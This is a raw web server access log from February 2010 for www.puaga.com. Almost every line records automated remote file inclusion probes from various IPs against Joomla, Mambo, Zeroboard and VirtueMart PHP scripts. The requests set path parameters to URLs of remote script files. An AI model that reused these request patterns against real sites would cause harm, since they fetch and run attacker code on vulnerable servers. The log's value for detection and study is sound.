220.73.144.196 - - [20/Feb/2010:07:13:35 -0800] "GET /secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:13:35 -0800] "GET /logs/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:14:02 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:14:02 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:14:02 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:14:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:14:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:14:08 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:07:15:14 -0800] "GET /logs/access_100210.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:17:33 -0800] "GET /logs/access_100208.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:18:17 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:18:17 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:18:18 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:18:21 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:18:21 -0800] "GET /logs/access_100124.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:18:21 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:18:32 -0800] "GET /logs/access_100127.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:18:43 -0800] "GET /logs/access_100122.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:19:32 -0800] "GET /logs/errors.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:19:32 -0800] "GET /errors.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:19:33 -0800] "GET /logs/access_100127.log%20%20/errors.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:19:43 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:19:47 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:19:47 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:19:48 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:19:48 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:19:48 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:20:04 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:20:04 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:20:04 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:23:27 -0800] "GET /logs/access_100122.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:23:37 -0800] "GET /logs/access_100121.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:26:11 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:26:23 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:26:50 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:26:50 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:26:50 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:27:40 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:28:16 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:28:16 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:28:16 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:07:29:31 -0800] "GET /logs/access_100122.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:29:57 -0800] "GET /logs/access_100114.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:29:57 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:29:57 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:30:23 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:30:23 -0800] "GET /logs/access_100114.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:30:23 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:30:29 -0800] "GET /logs/access_100114.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:30:29 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:30:29 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:30:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:30:56 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:30:56 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:31:12 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:31:20 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:31:20 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:31:20 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:31:24 -0800] "GET /logs/access_100208.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:31:30 -0800] "GET /logs/access_100208.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.108.159 - - [20/Feb/2010:07:31:43 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
65.55.108.159 - - [20/Feb/2010:07:31:43 -0800] "GET /atesh_info/nt.php?t=1808950867 HTTP/1.1" 200 61 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
221.139.0.75 - - [20/Feb/2010:07:32:03 -0800] "GET /logs/access_100125.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:32:03 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:32:04 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:32:16 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:07:32:50 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:07:32:50 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:07:32:50 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:32:56 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:33:54 -0800] "GET /modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:33:54 -0800] "GET /logs/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:33:54 -0800] "GET /logs/access_100204.log%20%20/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:33:57 -0800] "GET /logs/access_100207.log%20%20/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:34:41 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:34:41 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:34:41 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [20/Feb/2010:07:34:45 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://socialmedianews.ca/includes/hn_files/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:35:09 -0800] "GET /logs/access.log%20%20/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:35:09 -0800] "GET /logs/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:35:09 -0800] "GET /header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:35:17 -0800] "GET /logs/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:35:17 -0800] "GET /logs/access.log%20%20/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:35:20 -0800] "GET /header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:36:04 -0800] "GET /logs/access_100129.log%20%20/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:36:16 -0800] "GET /logs/access_100129.log%20%20/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:36:45 -0800] "GET /logs/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:36:45 -0800] "GET /logs/access.log/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:36:45 -0800] "GET /header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:00 -0800] "GET /logs/access.log/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:00 -0800] "GET /header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:00 -0800] "GET /logs/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:02 -0800] "GET /logs/access_100205.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:02 -0800] "GET /logs/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:02 -0800] "GET /ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:02 -0800] "GET /logs/access_100207.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:09 -0800] "GET /logs/access.log/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:12 -0800] "GET /header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:37:12 -0800] "GET /logs/header.php?tpl_pgb_moddir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:07:37:14 -0800] "GET /logs/access_100122.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:07:37:14 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:07:37:15 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:37 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:37 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:39 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:40 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:43 -0800] "GET /logs/access_100114.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:07:37:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
